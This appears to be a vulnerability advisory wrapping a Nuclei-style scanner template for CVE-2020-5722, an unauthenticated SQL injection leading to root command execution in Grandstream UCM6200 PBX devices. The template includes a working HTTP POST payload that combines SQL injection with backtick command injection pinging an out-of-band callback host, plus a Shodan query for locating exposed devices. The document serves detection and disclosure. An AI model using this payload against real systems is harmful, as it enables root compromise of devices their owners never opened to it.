漏洞描述
Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
CVE-2020-5722: Grandstream UCM6200 - SQL Injection
PoC代码[已公开]
id: CVE-2020-5722
info:
name: Grandstream UCM6200 - SQL Injection
author: theamanrawat
severity: critical
description: |
Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
impact: |
Attackers can execute root shell commands or inject malicious HTML, leading to full device compromise or phishing attacks.
remediation: |
Update to version 1.0.19.20 or later for root command execution fix, and version 1.0.20.17 or later for email injection fix.
reference:
- https://threatprotect.qualys.com/2020/04/01/grandstream-ucm62xx-remote-code-execution-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2020-5722
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-5722
epss-score: 0.93481
epss-percentile: 0.99812
cwe-id: CWE-89
metadata:
verified: false
max-request: 1
shodan-query: 'ssl:"Grandstream" "Set-Cookie: TRACKID"'
tags: cve,cve2020,grandstream,sqli,rce,vuln,kev,vkev
http:
- raw:
- |
POST /cgi? HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 87
action=sendPasswordEmail&user_name=admin'+or+1=1--`;`ping${IFS}{{interactsh-url}}`;`
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'interactsh_protocol == "dns"'
condition: and
# digest: 4a0a00473045022100f43ec6300e5344533201a8b275e897ac8be11e4d33781b818700fcbc2e8aa5ff022025c3d7e91313594ce0902d0810c221502cc7023fdc0262956ef8ec0e4d44500c:922c64590222798bb761d5b6d8e72950